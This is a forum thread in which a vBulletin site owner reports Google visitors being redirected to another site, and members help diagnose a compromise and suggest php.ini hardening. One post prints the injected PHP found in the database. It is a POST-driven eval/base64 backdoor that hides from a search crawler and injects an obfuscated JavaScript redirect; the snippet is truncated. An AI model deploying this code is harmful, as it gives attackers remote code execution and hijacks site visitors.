Results 1 to 12 of 12
  1. #1

    vbulletin/vbseo hacked?

    Hello,

    i have very strange problem with my vbulletin board (3.8.7). The problem is Google Re-Direct clicks to my forum to MyFileStore.com. I read everything on vbseo and vbulletin boards and reinstalled vbseo, which is supposedly causing the problem. But today the problem came back.

    Any ideas?

  2. #2
    Have you tried contacting vb about the issue? There may be a known exploit that they have a security patch for

  3. #3
    Join Date
    Mar 2009
    Location
    Miami, Florida
    Posts
    18,837
    Hello,
    Are you sure it is not an issue with your machine? I have seen rogue anti-viruses and adware re-direct google searches. Can you try it on another computer?
    Keith I Myers
    CEO and Founder - RemoteRAM.com
    The world leader in Cloud Based RAM
    KMyers.me The rantings of a lunatic

  4. #4
    Join Date
    Aug 2005
    Location
    behind my screen
    Posts
    402
    this sounds like that vbSeo exploit from months ago are you sure you run the latest availible versions ?

  5. #5
    Quote Originally Posted by cpanellover View Post
    this sounds like that vbSeo exploit from months ago are you sure you run the latest availible versions ?
    I thought the same, so i reinstalled Vbseo three days ago. But today i saw the redirection again.

  6. #6
    Join Date
    Aug 2011
    Posts
    720
    There is Support section in vbseo. So you can discuss your problem there. I am agree with KMyers. There are some free software and anti virus which re-direct google searches to a particular sites.

  7. #7
    Join Date
    Aug 2005
    Location
    behind my screen
    Posts
    402
    hi,

    1)check vbulletin.com for security patches
    2)temporarly disable custom plugins
    3) redirection gone ? good not gone ? well.....
    4)you have a problem on the server that needs to be investigated by somebody with full access

  8. #8
    My admin just found this code in MySQL (datastore, plugins)

    Code:
    if(isset($_POST[$x]))eval(base64_decode(str_rot13($_POST[$x])));unset($x);
    ini_set('display_errors',0);ini_set('log_errors',0);
    $r=!empty($_SERVER['HTTP_REFERER']) ? $_SERVER['HTTP_REFERER'] : getenv('HTTP_REFERER');
    if(strlen($r)>10)
    {
    $ip=$_SERVER['REMOTE_ADDR'];$hn=@gethostbyaddr($ip);
    if((strpos($ip,'65.55.')!==0)&&(strpos($hn,'msnbot')===false))
    {
            $s=array('search.live.com','www.google','search.yahoo.com','www.bing.com','yandex.ru','baidu.com');
            foreach($s as $e)
            {
                    if((strpos($r,$e)!==false)&&(empty($_COOKIE['vbsp'])))
                    {
                            $h=strtoupper(substr(@md5($_SERVER['HTTP_HOST']),0,8));
                            die("<html><head></head><body><script type=\"text/javascript\">var vbsp='$h';".str_replace('\\','\\\\',gzinflate(base64_decode('XVLbctowFPwVmpmOpLFDuBgMcd1MQqBN703avlhqRwgBDmAcYy6J5X/vihQmU9vHZ7V7LvsgvZFzOl

    Is this related to any known issue?

  9. #9
    Join Date
    Aug 2005
    Location
    behind my screen
    Posts
    402
    that is exploit code disable base64_encode and base64_decode PHP functions in php.ini do remember that vBulletin uses those itself on upgrades/installs so you need to renable them if you are going to upgrade/install also "register_globals = off" in php.ini restart the server after editing php.ini the "@" you see before PHP functions calls cause that script to throw no errormessage if the function fails.Also have you seen this

    http://www.vbseo.com/f5/vbseo-securi...3/index12.html
    Last edited by cpanellover; 02-29-2012 at 01:35 PM.

  10. #10
    1.) So if this "virus code" is in "datastore", then if i disable/enable any plugin, datastore will be cleared and "virus code" will vanish?

    2.) But from what i understand, it will come back and attach "virus code" again. So how do i find it source and delete it completely?

    Do i understand that correctly?
    Last edited by mikewiz; 02-29-2012 at 03:01 PM.

  11. #11
    Join Date
    Aug 2005
    Location
    behind my screen
    Posts
    402
    Quote Originally Posted by mikewiz View Post
    1.) So if this "virus code" is in "datastore", then if i disable/enable any plugin, datastore will be cleared and "virus code" will vanish?

    2.) But from what i understand, it will come back and attach "virus code" again. So how do i find it source and delete it completely?

    Do i understand that correctly?
    The best thing you can do is contact vBulletin support the creators of the product are the most qualified to tell you howto deal with this.It's possible it comes back but be carefull with the datastore if you do anything wrong it might corrupt your database and your board will stop working.Ask Steve at vbulletin.com he is verry smart with things like this.it might not be vbSeo look here what yui library version are you running ? try in your vBulletin control panel


    1. Admin CP >> Settings >> Options >> Server Settings and Optimization Options
    2. Scroll down to Use Remote YUI
    3. Set this to Google
    Last edited by cpanellover; 02-29-2012 at 03:16 PM.

  12. #12
    Join Date
    Mar 2012
    Posts
    33
    Also have a check on your .htaccess file.
    It might be vulnerable.

Similar Threads

  1. vBSEO and vBulletin
    By teck in forum Software & Scripts Offers
    Replies: 17
    Last Post: 04-08-2011, 02:18 AM
  2. vbulletin + vbseo managed hosting.
    By IsMaR in forum Managed Hosting and Services
    Replies: 15
    Last Post: 11-06-2010, 11:22 PM
  3. Replies: 12
    Last Post: 11-08-2008, 10:50 AM
  4. vBulletin + vbSEO + drupal
    By vjai in forum Dedicated Server
    Replies: 10
    Last Post: 02-26-2008, 10:37 PM
  5. vBulletin and vBSEO - best host ?
    By vjai in forum Web Hosting
    Replies: 16
    Last Post: 02-24-2008, 02:15 PM

Related Posts from theWHIR.com

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •